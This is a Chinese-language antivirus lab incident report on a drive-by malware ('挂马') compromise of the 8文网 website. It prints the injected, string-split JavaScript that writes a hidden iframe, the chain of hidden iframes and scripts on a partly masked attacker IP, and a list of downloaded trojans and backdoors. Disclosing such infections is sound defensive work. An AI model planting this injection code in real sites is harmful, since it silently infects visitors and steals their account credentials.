八文网网站挂马事件

11月15日，安天实验室反病毒监测网发现，八文网网站(http://www.8***.com
/search/docs/%CF%D6%B4%FA%CA%AB/1)被黑客植入病毒，用户如果访问该网站，会被
病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。有可能被远程控制，
盗取用户敏感信息等。
　　
　　该网站的主页里的http://www.8***.com/js/search_bot.js被插入如下挂马代码：

　　

　　var strBegin = "<i" + "fr" + "ame src=/"ht";
　　document.writeln( strBegin + "tp:////60." + "190.10"
　　+ "1." + "2" + "06//m1.h" + "tm?9792/" width=/"20/"
　　height=/"0/" fr" + "amebo");
　　document.writeln(strEnd);
　　使用了字符变量，仔细分析得到连接地址：http://60.190.101.***/m1.htm?9792
　　访问该地址得到代码：

　　

　　很多挂马地址。
　　<HTML>
　　<script src=http://60.190.101.***/aa/aa.js></script>
　　
　　</HTML>
　　<iframe src="http://60.190.101.***/aa/aa1.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa2.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa3.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa4.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa5.htm" width="20" height="0"
　　frameborder="0"></iframe>

　　<iframe src="http://60.190.101.***/aa/aa6.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　<iframe src="http://60.190.101.***/aa/aa.htm" width="20" height="0"
　　frameborder="0"></iframe>
　　
　　http://60.190.101.***/aa/aa.js为加密网马：

　　

　　

　　http://60.190.101.***/aa/aa1.htm
　　被插入：http://60.190.101.***/aa/ccc1.js
　　　　
　　http://60.190.101.***/aa/ccc1.js得到挂马代码：

　　

　　http://60.190.101.***/aa/aa2.htm代码：

　　

　　http://60.190.101.***/aa/aa3.htm被插入：
　　<script language=javascript
　　src=http://60.190.101.***/aa/xl.js></script>
　　
　　http://60.190.101.***/aa/xl.js为讯雷漏洞网马：

　　

　　http://60.190.101.***/aa/aa4.htm代码：

　　

　　http://60.190.101.***/aa/aa5.htm 被插入：
　　script language=javascript
　　src=http://60.190.101.***/aa/bb.js></script>
　　
　　http://60.190.101.***/aa/bb.js的代码：

　　

　　http://60.190.101.***/aa/aa6.htm得到代码：

　　

　　http://60.190.101.***/aa/aa.htm代码：

　　

　　当用户访问http://www.8***.com/search/docs/%CF%D6%B4%FA%CA%AB/1时，
　　系统会自动隐藏下载以下病毒文件：

　　http://60.190.101.***/abc.exe
　　病毒名：(Worm.Win32.Downloader.f) 蠕虫下载者木马

　　http://60.190.101.***/aa1.exe
　　病毒名：(Trojan-Downloader.Win32.Delf.aas) 下载者木马

　　一旦运行该木马将下载以下病毒到用户的系统，并运行。

　　http://60.190.101.***/aa2.exe
　　病毒名：(Backdoor.Win32.Agent.afh) 后门木马

　　http://60.190.101.***/aa3.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hpj) 盗号木马

　　http://60.190.101.***/aa4.exe
　　病毒名：(rojan-PSW.Win32.OnLineGames.hqn) 盗号木马

　　http://60.190.101.***/aa5.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.fyn) 游戏盗号木马

　　http://60.190.101.***/aa6.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gny) 游戏盗号木马

　　http://60.190.101.***/aa7.exe
　　病毒名：(Trojan-Downloader.Win32.Agent.blm) 下载者木马

　　http://60.190.101.***/aa8.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gti) 盗号木马

　　http://60.190.101.***/aa9.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqy) 游戏木马

　　http://60.190.101.***/aa10.exe
　　病毒名：(Trojan-PSW.Win32.Lmir.bos) 游戏木马

　　http://60.190.101.***/aa11.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.gxb) 游戏盗号木马

　　http://60.190.101.***/aa12.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hcp) 游戏盗号木马

　　http://60.190.101.***/aa13.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hnt) 游戏盗号木马

　　http://60.190.101.***/aa14.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqc) 游戏盗号木马

　　http://60.190.101.***/aa15.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hfd) 游戏木马

　　http://60.190.101.***/aa16.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hfr) 游戏盗号木马

　　http://60.190.101.***/aa17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqx) 游戏木马

　　http://60.190.101.***/aa18.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hqh) 游戏木马

　　http://60.190.101.***/aa19.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.hre) 游戏木马

　　http://60.190.101.***/aa20.exe
　　病毒名：(Backdoor.Win32.Delf.awy) 后门木马

　　http://60.190.101.***/aa21.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ghq) 游戏木马